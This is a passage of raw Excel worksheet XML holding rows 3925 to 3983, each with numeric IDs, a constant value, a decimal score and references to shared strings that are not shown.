      <c r="B3925">
        <v>7005</v>
      </c>
      <c r="C3925">
        <v>7005</v>
      </c>
      <c r="D3925">
        <v>2</v>
      </c>
      <c r="E3925">
        <v>0.52950000762939453</v>
      </c>
      <c r="F3925" t="s">
        <v>5592</v>
      </c>
      <c r="G3925" t="s">
        <v>7761</v>
      </c>
      <c r="H3925" t="s">
        <v>7762</v>
      </c>
    </row>
    <row r="3926" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3926" s="1">
        <v>3924</v>
      </c>
      <c r="B3926">
        <v>2060</v>
      </c>
      <c r="C3926">
        <v>2060</v>
      </c>
      <c r="D3926">
        <v>2</v>
      </c>
      <c r="E3926">
        <v>0.59270000457763672</v>
      </c>
      <c r="F3926" t="s">
        <v>5592</v>
      </c>
      <c r="G3926" t="s">
        <v>7763</v>
      </c>
      <c r="H3926" t="s">
        <v>7764</v>
      </c>
    </row>
    <row r="3927" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3927" s="1">
        <v>3925</v>
      </c>
      <c r="B3927">
        <v>7004</v>
      </c>
      <c r="C3927">
        <v>7004</v>
      </c>
      <c r="D3927">
        <v>2</v>
      </c>
      <c r="E3927">
        <v>0.99830001592636108</v>
      </c>
      <c r="F3927" t="s">
        <v>5592</v>
      </c>
      <c r="G3927" t="s">
        <v>7765</v>
      </c>
      <c r="H3927" t="s">
        <v>7766</v>
      </c>
    </row>
    <row r="3928" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3928" s="1">
        <v>3926</v>
      </c>
      <c r="B3928">
        <v>2063</v>
      </c>
      <c r="C3928">
        <v>2063</v>
      </c>
      <c r="D3928">
        <v>2</v>
      </c>
      <c r="E3928">
        <v>0.60890001058578491</v>
      </c>
      <c r="F3928" t="s">
        <v>5592</v>
      </c>
      <c r="G3928" t="s">
        <v>7767</v>
      </c>
      <c r="H3928" t="s">
        <v>7768</v>
      </c>
    </row>
    <row r="3929" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3929" s="1">
        <v>3927</v>
      </c>
      <c r="B3929">
        <v>2064</v>
      </c>
      <c r="C3929">
        <v>2064</v>
      </c>
      <c r="D3929">
        <v>2</v>
      </c>
      <c r="E3929">
        <v>0.67760002613067627</v>
      </c>
      <c r="F3929" t="s">
        <v>5592</v>
      </c>
      <c r="G3929" t="s">
        <v>7769</v>
      </c>
      <c r="H3929" t="s">
        <v>7770</v>
      </c>
    </row>
    <row r="3930" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3930" s="1">
        <v>3928</v>
      </c>
      <c r="B3930">
        <v>2015</v>
      </c>
      <c r="C3930">
        <v>2015</v>
      </c>
      <c r="D3930">
        <v>2</v>
      </c>
      <c r="E3930">
        <v>0.54159998893737793</v>
      </c>
      <c r="F3930" t="s">
        <v>5592</v>
      </c>
      <c r="G3930" t="s">
        <v>7771</v>
      </c>
      <c r="H3930" t="s">
        <v>7772</v>
      </c>
    </row>
    <row r="3931" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3931" s="1">
        <v>3929</v>
      </c>
      <c r="B3931">
        <v>7003</v>
      </c>
      <c r="C3931">
        <v>7003</v>
      </c>
      <c r="D3931">
        <v>2</v>
      </c>
      <c r="E3931">
        <v>0.99709999561309814</v>
      </c>
      <c r="F3931" t="s">
        <v>5592</v>
      </c>
      <c r="G3931" t="s">
        <v>7773</v>
      </c>
      <c r="H3931" t="s">
        <v>7774</v>
      </c>
    </row>
    <row r="3932" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3932" s="1">
        <v>3930</v>
      </c>
      <c r="B3932">
        <v>2069</v>
      </c>
      <c r="C3932">
        <v>2069</v>
      </c>
      <c r="D3932">
        <v>2</v>
      </c>
      <c r="E3932">
        <v>0.78369998931884766</v>
      </c>
      <c r="F3932" t="s">
        <v>5592</v>
      </c>
      <c r="G3932" t="s">
        <v>7775</v>
      </c>
      <c r="H3932" t="s">
        <v>7776</v>
      </c>
    </row>
    <row r="3933" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3933" s="1">
        <v>3931</v>
      </c>
      <c r="B3933">
        <v>2071</v>
      </c>
      <c r="C3933">
        <v>2071</v>
      </c>
      <c r="D3933">
        <v>2</v>
      </c>
      <c r="E3933">
        <v>0.99699997901916504</v>
      </c>
      <c r="F3933" t="s">
        <v>5592</v>
      </c>
      <c r="G3933" t="s">
        <v>7777</v>
      </c>
      <c r="H3933" t="s">
        <v>7778</v>
      </c>
    </row>
    <row r="3934" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3934" s="1">
        <v>3932</v>
      </c>
      <c r="B3934">
        <v>2083</v>
      </c>
      <c r="C3934">
        <v>2083</v>
      </c>
      <c r="D3934">
        <v>2</v>
      </c>
      <c r="E3934">
        <v>0.78339999914169312</v>
      </c>
      <c r="F3934" t="s">
        <v>5592</v>
      </c>
      <c r="G3934" t="s">
        <v>7779</v>
      </c>
      <c r="H3934" t="s">
        <v>7780</v>
      </c>
    </row>
    <row r="3935" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3935" s="1">
        <v>3933</v>
      </c>
      <c r="B3935">
        <v>2084</v>
      </c>
      <c r="C3935">
        <v>2084</v>
      </c>
      <c r="D3935">
        <v>2</v>
      </c>
      <c r="E3935">
        <v>0.98329997062683105</v>
      </c>
      <c r="F3935" t="s">
        <v>5592</v>
      </c>
      <c r="G3935" t="s">
        <v>7781</v>
      </c>
      <c r="H3935" t="s">
        <v>7782</v>
      </c>
    </row>
    <row r="3936" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3936" s="1">
        <v>3934</v>
      </c>
      <c r="B3936">
        <v>2085</v>
      </c>
      <c r="C3936">
        <v>2085</v>
      </c>
      <c r="D3936">
        <v>2</v>
      </c>
      <c r="E3936">
        <v>0.93690001964569092</v>
      </c>
      <c r="F3936" t="s">
        <v>5592</v>
      </c>
      <c r="G3936" t="s">
        <v>7783</v>
      </c>
      <c r="H3936" t="s">
        <v>7784</v>
      </c>
    </row>
    <row r="3937" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3937" s="1">
        <v>3935</v>
      </c>
      <c r="B3937">
        <v>2086</v>
      </c>
      <c r="C3937">
        <v>2086</v>
      </c>
      <c r="D3937">
        <v>2</v>
      </c>
      <c r="E3937">
        <v>0.9781000018119812</v>
      </c>
      <c r="F3937" t="s">
        <v>5592</v>
      </c>
      <c r="G3937" t="s">
        <v>7785</v>
      </c>
      <c r="H3937" t="s">
        <v>7786</v>
      </c>
    </row>
    <row r="3938" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3938" s="1">
        <v>3936</v>
      </c>
      <c r="B3938">
        <v>2087</v>
      </c>
      <c r="C3938">
        <v>2087</v>
      </c>
      <c r="D3938">
        <v>2</v>
      </c>
      <c r="E3938">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3938" t="s">
        <v>5592</v>
      </c>
      <c r="G3938" t="s">
        <v>7787</v>
      </c>
      <c r="H3938" t="s">
        <v>7788</v>
      </c>
    </row>
    <row r="3939" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3939" s="1">
        <v>3937</v>
      </c>
      <c r="B3939">
        <v>2088</v>
      </c>
      <c r="C3939">
        <v>2088</v>
      </c>
      <c r="D3939">
        <v>2</v>
      </c>
      <c r="E3939">
        <v>0.99370002746582031</v>
      </c>
      <c r="F3939" t="s">
        <v>5592</v>
      </c>
      <c r="G3939" t="s">
        <v>7789</v>
      </c>
      <c r="H3939" t="s">
        <v>7790</v>
      </c>
    </row>
    <row r="3940" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3940" s="1">
        <v>3938</v>
      </c>
      <c r="B3940">
        <v>2089</v>
      </c>
      <c r="C3940">
        <v>2089</v>
      </c>
      <c r="D3940">
        <v>2</v>
      </c>
      <c r="E3940">
        <v>0.99720001220703125</v>
      </c>
      <c r="F3940" t="s">
        <v>5592</v>
      </c>
      <c r="G3940" t="s">
        <v>7791</v>
      </c>
      <c r="H3940" t="s">
        <v>7792</v>
      </c>
    </row>
    <row r="3941" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3941" s="1">
        <v>3939</v>
      </c>
      <c r="B3941">
        <v>2090</v>
      </c>
      <c r="C3941">
        <v>2090</v>
      </c>
      <c r="D3941">
        <v>2</v>
      </c>
      <c r="E3941">
        <v>0.99900001287460327</v>
      </c>
      <c r="F3941" t="s">
        <v>5592</v>
      </c>
      <c r="G3941" t="s">
        <v>7793</v>
      </c>
      <c r="H3941" t="s">
        <v>7794</v>
      </c>
    </row>
    <row r="3942" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3942" s="1">
        <v>3940</v>
      </c>
      <c r="B3942">
        <v>7001</v>
      </c>
      <c r="C3942">
        <v>7001</v>
      </c>
      <c r="D3942">
        <v>2</v>
      </c>
      <c r="E3942">
        <v>0.99860000610351563</v>
      </c>
      <c r="F3942" t="s">
        <v>5592</v>
      </c>
      <c r="G3942" t="s">
        <v>7795</v>
      </c>
      <c r="H3942" t="s">
        <v>7796</v>
      </c>
    </row>
    <row r="3943" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3943" s="1">
        <v>3941</v>
      </c>
      <c r="B3943">
        <v>1814</v>
      </c>
      <c r="C3943">
        <v>1814</v>
      </c>
      <c r="D3943">
        <v>2</v>
      </c>
      <c r="E3943">
        <v>0.93150001764297485</v>
      </c>
      <c r="F3943" t="s">
        <v>5592</v>
      </c>
      <c r="G3943" t="s">
        <v>7797</v>
      </c>
      <c r="H3943" t="s">
        <v>7798</v>
      </c>
    </row>
    <row r="3944" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3944" s="1">
        <v>3942</v>
      </c>
      <c r="B3944">
        <v>2014</v>
      </c>
      <c r="C3944">
        <v>2014</v>
      </c>
      <c r="D3944">
        <v>2</v>
      </c>
      <c r="E3944">
        <v>0.99119997024536133</v>
      </c>
      <c r="F3944" t="s">
        <v>5592</v>
      </c>
      <c r="G3944" t="s">
        <v>7799</v>
      </c>
      <c r="H3944" t="s">
        <v>7800</v>
      </c>
    </row>
    <row r="3945" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3945" s="1">
        <v>3943</v>
      </c>
      <c r="B3945">
        <v>2011</v>
      </c>
      <c r="C3945">
        <v>2011</v>
      </c>
      <c r="D3945">
        <v>2</v>
      </c>
      <c r="E3945">
        <v>0.93760001659393311</v>
      </c>
      <c r="F3945" t="s">
        <v>5592</v>
      </c>
      <c r="G3945" t="s">
        <v>7801</v>
      </c>
      <c r="H3945" t="s">
        <v>7802</v>
      </c>
    </row>
    <row r="3946" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3946" s="1">
        <v>3944</v>
      </c>
      <c r="B3946">
        <v>1943</v>
      </c>
      <c r="C3946">
        <v>1943</v>
      </c>
      <c r="D3946">
        <v>2</v>
      </c>
      <c r="E3946">
        <v>0.7215999960899353</v>
      </c>
      <c r="F3946" t="s">
        <v>5592</v>
      </c>
      <c r="G3946" t="s">
        <v>7803</v>
      </c>
      <c r="H3946" t="s">
        <v>7804</v>
      </c>
    </row>
    <row r="3947" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3947" s="1">
        <v>3945</v>
      </c>
      <c r="B3947">
        <v>1950</v>
      </c>
      <c r="C3947">
        <v>1950</v>
      </c>
      <c r="D3947">
        <v>2</v>
      </c>
      <c r="E3947">
        <v>0.74269998073577881</v>
      </c>
      <c r="F3947" t="s">
        <v>5592</v>
      </c>
      <c r="G3947" t="s">
        <v>7805</v>
      </c>
      <c r="H3947" t="s">
        <v>7806</v>
      </c>
    </row>
    <row r="3948" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3948" s="1">
        <v>3946</v>
      </c>
      <c r="B3948">
        <v>1951</v>
      </c>
      <c r="C3948">
        <v>1951</v>
      </c>
      <c r="D3948">
        <v>2</v>
      </c>
      <c r="E3948">
        <v>0.99479997158050537</v>
      </c>
      <c r="F3948" t="s">
        <v>5592</v>
      </c>
      <c r="G3948" t="s">
        <v>7807</v>
      </c>
      <c r="H3948" t="s">
        <v>7808</v>
      </c>
    </row>
    <row r="3949" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3949" s="1">
        <v>3947</v>
      </c>
      <c r="B3949">
        <v>1959</v>
      </c>
      <c r="C3949">
        <v>1959</v>
      </c>
      <c r="D3949">
        <v>2</v>
      </c>
      <c r="E3949">
        <v>0.50540000200271606</v>
      </c>
      <c r="F3949" t="s">
        <v>5592</v>
      </c>
      <c r="G3949" t="s">
        <v>7809</v>
      </c>
      <c r="H3949" t="s">
        <v>7810</v>
      </c>
    </row>
    <row r="3950" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3950" s="1">
        <v>3948</v>
      </c>
      <c r="B3950">
        <v>1961</v>
      </c>
      <c r="C3950">
        <v>1961</v>
      </c>
      <c r="D3950">
        <v>2</v>
      </c>
      <c r="E3950">
        <v>0.70880001783370972</v>
      </c>
      <c r="F3950" t="s">
        <v>5592</v>
      </c>
      <c r="G3950" t="s">
        <v>7811</v>
      </c>
      <c r="H3950" t="s">
        <v>7812</v>
      </c>
    </row>
    <row r="3951" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3951" s="1">
        <v>3949</v>
      </c>
      <c r="B3951">
        <v>1967</v>
      </c>
      <c r="C3951">
        <v>1967</v>
      </c>
      <c r="D3951">
        <v>2</v>
      </c>
      <c r="E3951">
        <v>0.98540002107620239</v>
      </c>
      <c r="F3951" t="s">
        <v>5592</v>
      </c>
      <c r="G3951" t="s">
        <v>7813</v>
      </c>
      <c r="H3951" t="s">
        <v>7814</v>
      </c>
    </row>
    <row r="3952" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3952" s="1">
        <v>3950</v>
      </c>
      <c r="B3952">
        <v>1970</v>
      </c>
      <c r="C3952">
        <v>1970</v>
      </c>
      <c r="D3952">
        <v>2</v>
      </c>
      <c r="E3952">
        <v>0.57029998302459717</v>
      </c>
      <c r="F3952" t="s">
        <v>5592</v>
      </c>
      <c r="G3952" t="s">
        <v>7815</v>
      </c>
      <c r="H3952" t="s">
        <v>7816</v>
      </c>
    </row>
    <row r="3953" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3953" s="1">
        <v>3951</v>
      </c>
      <c r="B3953">
        <v>1971</v>
      </c>
      <c r="C3953">
        <v>1971</v>
      </c>
      <c r="D3953">
        <v>2</v>
      </c>
      <c r="E3953">
        <v>0.56180000305175781</v>
      </c>
      <c r="F3953" t="s">
        <v>5592</v>
      </c>
      <c r="G3953" t="s">
        <v>7817</v>
      </c>
      <c r="H3953" t="s">
        <v>7818</v>
      </c>
    </row>
    <row r="3954" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3954" s="1">
        <v>3952</v>
      </c>
      <c r="B3954">
        <v>1975</v>
      </c>
      <c r="C3954">
        <v>1975</v>
      </c>
      <c r="D3954">
        <v>2</v>
      </c>
      <c r="E3954">
        <v>0.50110000371932983</v>
      </c>
      <c r="F3954" t="s">
        <v>5592</v>
      </c>
      <c r="G3954" t="s">
        <v>7819</v>
      </c>
      <c r="H3954" t="s">
        <v>7820</v>
      </c>
    </row>
    <row r="3955" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3955" s="1">
        <v>3953</v>
      </c>
      <c r="B3955">
        <v>1976</v>
      </c>
      <c r="C3955">
        <v>1976</v>
      </c>
      <c r="D3955">
        <v>2</v>
      </c>
      <c r="E3955">
        <v>0.71420001983642578</v>
      </c>
      <c r="F3955" t="s">
        <v>5592</v>
      </c>
      <c r="G3955" t="s">
        <v>7821</v>
      </c>
      <c r="H3955" t="s">
        <v>7822</v>
      </c>
    </row>
    <row r="3956" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3956" s="1">
        <v>3954</v>
      </c>
      <c r="B3956">
        <v>2012</v>
      </c>
      <c r="C3956">
        <v>2012</v>
      </c>
      <c r="D3956">
        <v>2</v>
      </c>
      <c r="E3956">
        <v>0.50760000944137573</v>
      </c>
      <c r="F3956" t="s">
        <v>5592</v>
      </c>
      <c r="G3956" t="s">
        <v>7823</v>
      </c>
      <c r="H3956" t="s">
        <v>7824</v>
      </c>
    </row>
    <row r="3957" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3957" s="1">
        <v>3955</v>
      </c>
      <c r="B3957">
        <v>1980</v>
      </c>
      <c r="C3957">
        <v>1980</v>
      </c>
      <c r="D3957">
        <v>2</v>
      </c>
      <c r="E3957">
        <v>0.6468999981880188</v>
      </c>
      <c r="F3957" t="s">
        <v>5592</v>
      </c>
      <c r="G3957" t="s">
        <v>7825</v>
      </c>
      <c r="H3957" t="s">
        <v>7826</v>
      </c>
    </row>
    <row r="3958" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3958" s="1">
        <v>3956</v>
      </c>
      <c r="B3958">
        <v>1984</v>
      </c>
      <c r="C3958">
        <v>1984</v>
      </c>
      <c r="D3958">
        <v>2</v>
      </c>
      <c r="E3958">
        <v>0.59320002794265747</v>
      </c>
      <c r="F3958" t="s">
        <v>5592</v>
      </c>
      <c r="G3958" t="s">
        <v>7827</v>
      </c>
      <c r="H3958" t="s">
        <v>7828</v>
      </c>
    </row>
    <row r="3959" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3959" s="1">
        <v>3957</v>
      </c>
      <c r="B3959">
        <v>1993</v>
      </c>
      <c r="C3959">
        <v>1993</v>
      </c>
      <c r="D3959">
        <v>2</v>
      </c>
      <c r="E3959">
        <v>0.86019998788833618</v>
      </c>
      <c r="F3959" t="s">
        <v>5592</v>
      </c>
      <c r="G3959" t="s">
        <v>7829</v>
      </c>
      <c r="H3959" t="s">
        <v>7830</v>
      </c>
    </row>
    <row r="3960" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3960" s="1">
        <v>3958</v>
      </c>
      <c r="B3960">
        <v>1994</v>
      </c>
      <c r="C3960">
        <v>1994</v>
      </c>
      <c r="D3960">
        <v>2</v>
      </c>
      <c r="E3960">
        <v>0.96990001201629639</v>
      </c>
      <c r="F3960" t="s">
        <v>5592</v>
      </c>
      <c r="G3960" t="s">
        <v>7831</v>
      </c>
      <c r="H3960" t="s">
        <v>7832</v>
      </c>
    </row>
    <row r="3961" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3961" s="1">
        <v>3959</v>
      </c>
      <c r="B3961">
        <v>1995</v>
      </c>
      <c r="C3961">
        <v>1995</v>
      </c>
      <c r="D3961">
        <v>2</v>
      </c>
      <c r="E3961">
        <v>0.37509998679161072</v>
      </c>
      <c r="F3961" t="s">
        <v>5592</v>
      </c>
      <c r="G3961" t="s">
        <v>7833</v>
      </c>
      <c r="H3961" t="s">
        <v>7834</v>
      </c>
    </row>
    <row r="3962" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3962" s="1">
        <v>3960</v>
      </c>
      <c r="B3962">
        <v>1996</v>
      </c>
      <c r="C3962">
        <v>1996</v>
      </c>
      <c r="D3962">
        <v>2</v>
      </c>
      <c r="E3962">
        <v>0.80349999666213989</v>
      </c>
      <c r="F3962" t="s">
        <v>5592</v>
      </c>
      <c r="G3962" t="s">
        <v>7835</v>
      </c>
      <c r="H3962" t="s">
        <v>7836</v>
      </c>
    </row>
    <row r="3963" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3963" s="1">
        <v>3961</v>
      </c>
      <c r="B3963">
        <v>1999</v>
      </c>
      <c r="C3963">
        <v>1999</v>
      </c>
      <c r="D3963">
        <v>2</v>
      </c>
      <c r="E3963">
        <v>0.85229998826980591</v>
      </c>
      <c r="F3963" t="s">
        <v>5592</v>
      </c>
      <c r="G3963" t="s">
        <v>7837</v>
      </c>
      <c r="H3963" t="s">
        <v>7838</v>
      </c>
    </row>
    <row r="3964" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3964" s="1">
        <v>3962</v>
      </c>
      <c r="B3964">
        <v>2001</v>
      </c>
      <c r="C3964">
        <v>2001</v>
      </c>
      <c r="D3964">
        <v>2</v>
      </c>
      <c r="E3964">
        <v>0.68790000677108765</v>
      </c>
      <c r="F3964" t="s">
        <v>5592</v>
      </c>
      <c r="G3964" t="s">
        <v>7839</v>
      </c>
      <c r="H3964" t="s">
        <v>7840</v>
      </c>
    </row>
    <row r="3965" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3965" s="1">
        <v>3963</v>
      </c>
      <c r="B3965">
        <v>2008</v>
      </c>
      <c r="C3965">
        <v>2008</v>
      </c>
      <c r="D3965">
        <v>2</v>
      </c>
      <c r="E3965">
        <v>0.97140002250671387</v>
      </c>
      <c r="F3965" t="s">
        <v>5592</v>
      </c>
      <c r="G3965" t="s">
        <v>7841</v>
      </c>
      <c r="H3965" t="s">
        <v>7842</v>
      </c>
    </row>
    <row r="3966" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3966" s="1">
        <v>3964</v>
      </c>
      <c r="B3966">
        <v>2009</v>
      </c>
      <c r="C3966">
        <v>2009</v>
      </c>
      <c r="D3966">
        <v>2</v>
      </c>
      <c r="E3966">
        <v>0.99599999189376831</v>
      </c>
      <c r="F3966" t="s">
        <v>5592</v>
      </c>
      <c r="G3966" t="s">
        <v>7843</v>
      </c>
      <c r="H3966" t="s">
        <v>7844</v>
      </c>
    </row>
    <row r="3967" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3967" s="1">
        <v>3965</v>
      </c>
      <c r="B3967">
        <v>2010</v>
      </c>
      <c r="C3967">
        <v>2010</v>
      </c>
      <c r="D3967">
        <v>2</v>
      </c>
      <c r="E3967">
        <v>0.90390002727508545</v>
      </c>
      <c r="F3967" t="s">
        <v>5592</v>
      </c>
      <c r="G3967" t="s">
        <v>7845</v>
      </c>
      <c r="H3967" t="s">
        <v>7846</v>
      </c>
    </row>
    <row r="3968" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3968" s="1">
        <v>3966</v>
      </c>
      <c r="B3968">
        <v>1981</v>
      </c>
      <c r="C3968">
        <v>1981</v>
      </c>
      <c r="D3968">
        <v>2</v>
      </c>
      <c r="E3968">
        <v>0.99919998645782471</v>
      </c>
      <c r="F3968" t="s">
        <v>5592</v>
      </c>
      <c r="G3968" t="s">
        <v>7847</v>
      </c>
      <c r="H3968" t="s">
        <v>7848</v>
      </c>
    </row>
    <row r="3969" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3969" s="1">
        <v>3967</v>
      </c>
      <c r="B3969">
        <v>990</v>
      </c>
      <c r="C3969">
        <v>990</v>
      </c>
      <c r="D3969">
        <v>2</v>
      </c>
      <c r="E3969">
        <v>0.92030000686645508</v>
      </c>
      <c r="F3969" t="s">
        <v>5592</v>
      </c>
      <c r="G3969" t="s">
        <v>7849</v>
      </c>
      <c r="H3969" t="s">
        <v>7850</v>
      </c>
    </row>
    <row r="3970" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3970" s="1">
        <v>3968</v>
      </c>
      <c r="B3970">
        <v>1810</v>
      </c>
      <c r="C3970">
        <v>1810</v>
      </c>
      <c r="D3970">
        <v>2</v>
      </c>
      <c r="E3970">
        <v>0.66720002889633179</v>
      </c>
      <c r="F3970" t="s">
        <v>5592</v>
      </c>
      <c r="G3970" t="s">
        <v>7851</v>
      </c>
      <c r="H3970" t="s">
        <v>7852</v>
      </c>
    </row>
    <row r="3971" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3971" s="1">
        <v>3969</v>
      </c>
      <c r="B3971">
        <v>1808</v>
      </c>
      <c r="C3971">
        <v>1808</v>
      </c>
      <c r="D3971">
        <v>2</v>
      </c>
      <c r="E3971">
        <v>0.51469999551773071</v>
      </c>
      <c r="F3971" t="s">
        <v>5592</v>
      </c>
      <c r="G3971" t="s">
        <v>7853</v>
      </c>
      <c r="H3971" t="s">
        <v>7854</v>
      </c>
    </row>
    <row r="3972" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3972" s="1">
        <v>3970</v>
      </c>
      <c r="B3972">
        <v>7224</v>
      </c>
      <c r="C3972">
        <v>7224</v>
      </c>
      <c r="D3972">
        <v>2</v>
      </c>
      <c r="E3972">
        <v>0.67830002307891846</v>
      </c>
      <c r="F3972" t="s">
        <v>5592</v>
      </c>
      <c r="G3972" t="s">
        <v>7855</v>
      </c>
      <c r="H3972" t="s">
        <v>7856</v>
      </c>
    </row>
    <row r="3973" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3973" s="1">
        <v>3971</v>
      </c>
      <c r="B3973">
        <v>7223</v>
      </c>
      <c r="C3973">
        <v>7223</v>
      </c>
      <c r="D3973">
        <v>2</v>
      </c>
      <c r="E3973">
        <v>0.9692000150680542</v>
      </c>
      <c r="F3973" t="s">
        <v>5592</v>
      </c>
      <c r="G3973" t="s">
        <v>7857</v>
      </c>
      <c r="H3973" t="s">
        <v>7858</v>
      </c>
    </row>
    <row r="3974" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3974" s="1">
        <v>3972</v>
      </c>
      <c r="B3974">
        <v>1564</v>
      </c>
      <c r="C3974">
        <v>1564</v>
      </c>
      <c r="D3974">
        <v>2</v>
      </c>
      <c r="E3974">
        <v>0.67159998416900635</v>
      </c>
      <c r="F3974" t="s">
        <v>5592</v>
      </c>
      <c r="G3974" t="s">
        <v>7859</v>
      </c>
      <c r="H3974" t="s">
        <v>7860</v>
      </c>
    </row>
    <row r="3975" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3975" s="1">
        <v>3973</v>
      </c>
      <c r="B3975">
        <v>1568</v>
      </c>
      <c r="C3975">
        <v>1568</v>
      </c>
      <c r="D3975">
        <v>2</v>
      </c>
      <c r="E3975">
        <v>0.74599999189376831</v>
      </c>
      <c r="F3975" t="s">
        <v>5592</v>
      </c>
      <c r="G3975" t="s">
        <v>7861</v>
      </c>
      <c r="H3975" t="s">
        <v>7862</v>
      </c>
    </row>
    <row r="3976" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3976" s="1">
        <v>3974</v>
      </c>
      <c r="B3976">
        <v>1572</v>
      </c>
      <c r="C3976">
        <v>1572</v>
      </c>
      <c r="D3976">
        <v>2</v>
      </c>
      <c r="E3976">
        <v>0.8474000096321106</v>
      </c>
      <c r="F3976" t="s">
        <v>5592</v>
      </c>
      <c r="G3976" t="s">
        <v>7863</v>
      </c>
      <c r="H3976" t="s">
        <v>7864</v>
      </c>
    </row>
    <row r="3977" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3977" s="1">
        <v>3975</v>
      </c>
      <c r="B3977">
        <v>7220</v>
      </c>
      <c r="C3977">
        <v>7220</v>
      </c>
      <c r="D3977">
        <v>2</v>
      </c>
      <c r="E3977">
        <v>0.99129998683929443</v>
      </c>
      <c r="F3977" t="s">
        <v>5592</v>
      </c>
      <c r="G3977" t="s">
        <v>7865</v>
      </c>
      <c r="H3977" t="s">
        <v>7866</v>
      </c>
    </row>
    <row r="3978" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3978" s="1">
        <v>3976</v>
      </c>
      <c r="B3978">
        <v>1579</v>
      </c>
      <c r="C3978">
        <v>1579</v>
      </c>
      <c r="D3978">
        <v>2</v>
      </c>
      <c r="E3978">
        <v>0.60769999027252197</v>
      </c>
      <c r="F3978" t="s">
        <v>5592</v>
      </c>
      <c r="G3978" t="s">
        <v>7867</v>
      </c>
      <c r="H3978" t="s">
        <v>7868</v>
      </c>
    </row>
    <row r="3979" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3979" s="1">
        <v>3977</v>
      </c>
      <c r="B3979">
        <v>1580</v>
      </c>
      <c r="C3979">
        <v>1580</v>
      </c>
      <c r="D3979">
        <v>2</v>
      </c>
      <c r="E3979">
        <v>0.9944000244140625</v>
      </c>
      <c r="F3979" t="s">
        <v>5592</v>
      </c>
      <c r="G3979" t="s">
        <v>7869</v>
      </c>
      <c r="H3979" t="s">
        <v>7870</v>
      </c>
    </row>
    <row r="3980" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3980" s="1">
        <v>3978</v>
      </c>
      <c r="B3980">
        <v>7217</v>
      </c>
      <c r="C3980">
        <v>7217</v>
      </c>
      <c r="D3980">
        <v>2</v>
      </c>
      <c r="E3980">
        <v>0.49909999966621399</v>
      </c>
      <c r="F3980" t="s">
        <v>5592</v>
      </c>
      <c r="G3980" t="s">
        <v>7871</v>
      </c>
      <c r="H3980" t="s">
        <v>7872</v>
      </c>
    </row>
    <row r="3981" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3981" s="1">
        <v>3979</v>
      </c>
      <c r="B3981">
        <v>1587</v>
      </c>
      <c r="C3981">
        <v>1587</v>
      </c>
      <c r="D3981">
        <v>2</v>
      </c>
      <c r="E3981">
        <v>0.60259997844696045</v>
      </c>
      <c r="F3981" t="s">
        <v>5592</v>
      </c>
      <c r="G3981" t="s">
        <v>7873</v>
      </c>
      <c r="H3981" t="s">
        <v>7874</v>
      </c>
    </row>
    <row r="3982" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3982" s="1">
        <v>3980</v>
      </c>
      <c r="B3982">
        <v>1588</v>
      </c>
      <c r="C3982">
        <v>1588</v>
      </c>
      <c r="D3982">
        <v>2</v>
      </c>
      <c r="E3982">
        <v>0.86260002851486206</v>
      </c>
      <c r="F3982" t="s">
        <v>5592</v>
      </c>
      <c r="G3982" t="s">
        <v>7875</v>
      </c>
      <c r="H3982" t="s">
        <v>7876</v>
      </c>
    </row>
    <row r="3983" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3983" s="1">
        <v>3981</v>
      </c>
      <c r="B3983">
        <v>1589</v>
      </c>
      <c r="C3983">
        <v>1589</v>
      </c>
      <c r="D3983">
        <v>2</v>
      </c>
      <c r="E3983">
